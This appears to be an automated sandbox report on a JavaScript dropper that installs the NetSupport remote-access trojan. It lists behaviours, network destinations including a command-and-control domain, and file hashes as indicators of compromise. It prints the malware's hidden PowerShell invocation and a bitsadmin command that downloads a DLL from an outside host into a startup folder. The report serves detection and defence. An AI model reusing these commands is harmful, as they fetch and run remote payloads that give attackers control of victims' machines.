Malware Analysis Report

2025-04-13 09:52

Sample ID 230709-x1skwagc3x
Target ave603jsjsjsjsjsjsjsjsjsj.js
SHA256 48a8c57895c2cfdf13a402e669a9964f56128521404e47b4727672f8ca91a90d
Tags
netsupport rat
score
10/10

Analysis Overview

score
10/10

SHA256

48a8c57895c2cfdf13a402e669a9964f56128521404e47b4727672f8ca91a90d

Threat Level: Known bad

The file ave603jsjsjsjsjsjsjsjsjsj.js was found to be: Known bad.

Malicious Activity Summary

netsupport rat

NetSupport

Executes dropped EXE

Loads dropped DLL

Checks computer location settings

Enumerates physical storage devices

Download via BitsAdmin

Suspicious use of WriteProcessMemory

Suspicious use of FindShellTrayWindow

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-07-09 19:19

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-07-09 19:19

Reported

2023-07-09 19:22

Platform

win7-20230703-en

Max time kernel

39s

Max time network

43s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\ave603jsjsjsjsjsjsjsjsjsj.js

Signatures

Enumerates physical storage devices

Download via BitsAdmin

dropper
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\bitsadmin.exe | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\ave603jsjsjsjsjsjsjsjsjsj.js

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle hidden -File C:\Users\Admin\AppData\Local\Temp\wzt5yg9.ps1

C:\Windows\system32\bitsadmin.exe

"C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/AudioCapture.dll C:\Users\Admin\AppData\RoamingOfficeStartupAudioCapture.dll

Network

Country Destination Domain Proto
US 8.8.8.8:53 virvatulishop.com udp
FI 5.44.245.24:443 virvatulishop.com tcp

Files

memory/1720-60-0x000000001B2A0000-0x000000001B582000-memory.dmp

memory/1720-61-0x0000000002040000-0x0000000002048000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\wzt5yg9.ps1

MD5 d85c0eada7610417ac3448efa1975122
SHA1 0243c3ac3e03279f6abc4817906ab95d74c8c2f7
SHA256 7689232c0352a14f0ff0967d88e6964eddaf25e2d282f8484fa17abb3b486a37
SHA512 b3e627647589839f6383942a5db24d3b46fe0068027307eb6805e933ea481d550f8c59eab566dd9a62af1e8126efbd8416ad870da489623107415f2a8067c7d1

memory/1720-63-0x00000000025B0000-0x0000000002630000-memory.dmp

memory/1720-64-0x00000000025B0000-0x0000000002630000-memory.dmp

memory/1720-65-0x00000000025B0000-0x0000000002630000-memory.dmp

memory/1720-66-0x00000000025B0000-0x0000000002630000-memory.dmp

memory/1720-67-0x00000000025B0000-0x0000000002630000-memory.dmp

memory/1720-68-0x00000000025B0000-0x0000000002630000-memory.dmp

memory/1720-69-0x00000000025B0000-0x0000000002630000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-07-09 19:19

Reported

2023-07-09 19:22

Platform

win10v2004-20230703-en

Max time kernel

143s

Max time network

148s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\ave603jsjsjsjsjsjsjsjsjsj.js

Signatures

NetSupport

rat netsupport

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-1043950675-1972537973-2972532878-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\wscript.exe | N/A

Executes dropped EXE

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe | N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe | N/A

Suspicious use of FindShellTrayWindow

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe | N/A

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\ave603jsjsjsjsjsjsjsjsjsj.js

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle hidden -File C:\Users\Admin\AppData\Local\Temp\ci6dzrr.ps1

C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe

"C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 virvatulishop.com udp
FI 5.44.245.24:443 virvatulishop.com tcp
US 8.8.8.8:53 24.245.44.5.in-addr.arpa udp
US 8.8.8.8:53 deperekanuki1.com udp
RU 5.42.74.53:5222 deperekanuki1.com tcp
US 8.8.8.8:53 geo.netsupportsoftware.com udp
GB 62.172.138.67:80 geo.netsupportsoftware.com tcp
US 8.8.8.8:53 53.74.42.5.in-addr.arpa udp
US 8.8.8.8:53 67.138.172.62.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 64.13.109.52.in-addr.arpa udp
US 8.8.8.8:53 254.5.248.8.in-addr.arpa udp
US 8.8.8.8:53 208.143.182.52.in-addr.arpa udp

Files

memory/3664-137-0x000001F8A7EB0000-0x000001F8A7ED2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qzjuzens.33u.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\ci6dzrr.ps1

MD5 d83dc9e78a9b12b1cda85e65346f50d1
SHA1 9435de2c91c3bad6ec6ee038d55aeb8c20abd48a
SHA256 a590116ad5c79bb6201ac6067101b388ae853dc8d40debd3d2cd9912f96cb94b
SHA512 c9d1192b65552e72c33c1c18f7e0e3f01a7ffa855bb56f0039a380753c002b521d203be4e9b0467ca008921e2ef52573df2ed5fd59d782639c52aad65af22a3d

memory/3664-148-0x000001F8A7FB0000-0x000001F8A7FC0000-memory.dmp

memory/3664-149-0x000001F8A7FB0000-0x000001F8A7FC0000-memory.dmp

memory/3664-150-0x000001F8A7FB0000-0x000001F8A7FC0000-memory.dmp

memory/3664-151-0x000001F8A7F50000-0x000001F8A7F64000-memory.dmp

memory/3664-152-0x000001F8A7F70000-0x000001F8A7F82000-memory.dmp

memory/3664-153-0x000001F8A7F40000-0x000001F8A7F4A000-memory.dmp

C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe

MD5 45fe5531717cd1b9532cbb6a5daaeb3a
SHA1 cb908e267a08c37d7e184f47f788e82cca38f83e
SHA256 ab6a4ccb752858c8c6e8223cd3510503928c3f9816cc655f0033d86c15c28ed9
SHA512 5ce8ea56144345802342f618c51acdbcfef3349e81e145c200ff77e217e86556f833236d85caf6ff1c8d954370bbb88e9581d9b0807b530344a8e084ede60bcb

C:\Users\Admin\AppData\RoamingOfficeStartup\PCICL32.dll

MD5 9c9302e75c25c2ba996efd89a1047205
SHA1 9e79627ff32d5abd3382b65a509baeb31c78a7f2
SHA256 beb7b9a9fb02b2ad9965364fd6769ea0d8b324049da86eedd406e1c3703502c1
SHA512 d120b380ecd937826ab992802d8aae85f747031d50c1f6421a6c5ac32871a08f1a9c612c41946dd0aeabc01b1737cae6a1de70f9af36020af2b679e556d54fa1

C:\Users\Admin\AppData\RoamingOfficeStartup\PCICL32.DLL

MD5 9c9302e75c25c2ba996efd89a1047205
SHA1 9e79627ff32d5abd3382b65a509baeb31c78a7f2
SHA256 beb7b9a9fb02b2ad9965364fd6769ea0d8b324049da86eedd406e1c3703502c1
SHA512 d120b380ecd937826ab992802d8aae85f747031d50c1f6421a6c5ac32871a08f1a9c612c41946dd0aeabc01b1737cae6a1de70f9af36020af2b679e556d54fa1

C:\Users\Admin\AppData\RoamingOfficeStartup\pcicapi.dll

MD5 34dfb87e4200d852d1fb45dc48f93cfc
SHA1 35b4e73fb7c8d4c3fefb90b7e7dc19f3e653c641
SHA256 2d6c6200508c0797e6542b195c999f3485c4ef76551aa3c65016587788ba1703
SHA512 f5bb4e700322cbaa5069244812a9b6ce6899ce15b4fd6384a3e8be421e409e4526b2f67fe210394cd47c4685861faf760eff9af77209100b82b2e0655581c9b2

C:\Users\Admin\AppData\RoamingOfficeStartup\PCICHEK.DLL

MD5 104b30fef04433a2d2fd1d5f99f179fe
SHA1 ecb08e224a2f2772d1e53675bedc4b2c50485a41
SHA256 956b9fa960f913cce3137089c601f3c64cc24c54614b02bba62abb9610a985dd
SHA512 5efcaa8c58813c3a0a6026cd7f3b34ad4fb043fd2d458db2e914429be2b819f1ac74e2d35e4439601cf0cb50fcdcafdcf868da328eaaeec15b0a4a6b8b2c218f

C:\Users\Admin\AppData\RoamingOfficeStartup\MSVCR100.dll

MD5 0e37fbfa79d349d672456923ec5fbbe3
SHA1 4e880fc7625ccf8d9ca799d5b94ce2b1e7597335
SHA256 8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18
SHA512 2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

C:\Users\Admin\AppData\RoamingOfficeStartup\msvcr100.dll

MD5 0e37fbfa79d349d672456923ec5fbbe3
SHA1 4e880fc7625ccf8d9ca799d5b94ce2b1e7597335
SHA256 8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18
SHA512 2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

C:\Users\Admin\AppData\RoamingOfficeStartup\pcichek.dll

MD5 104b30fef04433a2d2fd1d5f99f179fe
SHA1 ecb08e224a2f2772d1e53675bedc4b2c50485a41
SHA256 956b9fa960f913cce3137089c601f3c64cc24c54614b02bba62abb9610a985dd
SHA512 5efcaa8c58813c3a0a6026cd7f3b34ad4fb043fd2d458db2e914429be2b819f1ac74e2d35e4439601cf0cb50fcdcafdcf868da328eaaeec15b0a4a6b8b2c218f

C:\Users\Admin\AppData\RoamingOfficeStartup\client32.ini

MD5 a252f22f61f960c54fa32ae0de7dd17c
SHA1 00fe1097e70f1f6307e6bc68f40d49abb01dd2d5
SHA256 a5be7a73bbed8ec4e1a7819289da5412fe9ddf628941aa3b35fbe7454f148618
SHA512 7998e6cd43853b77e38cfedf0b6081c2965c9facb891ebd9a33db0e39b71d683f218174d87f99d5ab22983632c4c319bd63ec9dcbf1cbc81a77e3053ae3f1593

C:\Users\Admin\AppData\RoamingOfficeStartup\NSM.LIC

MD5 b9956282a0fed076ed083892e498ac69
SHA1 d14a665438385203283030a189ff6c5e7c4bf518
SHA256 fcc6afd664a8045bd61c398be3c37a97536a199a48d277e11977f93868ae1acc
SHA512 7daa09113c0e8a36c91cc6d657c65851a20dff6b60ac3d2f40c5737c12c1613c553955f84d131ba2139959973fef9fc616ca5e968cb16c25acf2d4739eed87eb

C:\Users\Admin\AppData\RoamingOfficeStartup\HTCTL32.DLL

MD5 c94005d2dcd2a54e40510344e0bb9435
SHA1 55b4a1620c5d0113811242c20bd9870a1e31d542
SHA256 3c072532bf7674d0c5154d4d22a9d9c0173530c0d00f69911cdbc2552175d899
SHA512 2e6f673864a54b1dcad9532ef9b18a9c45c0844f1f53e699fade2f41e43fa5cbc9b8e45e6f37b95f84cf6935a96fba2950ee3e0e9542809fd288fefba34ddd6a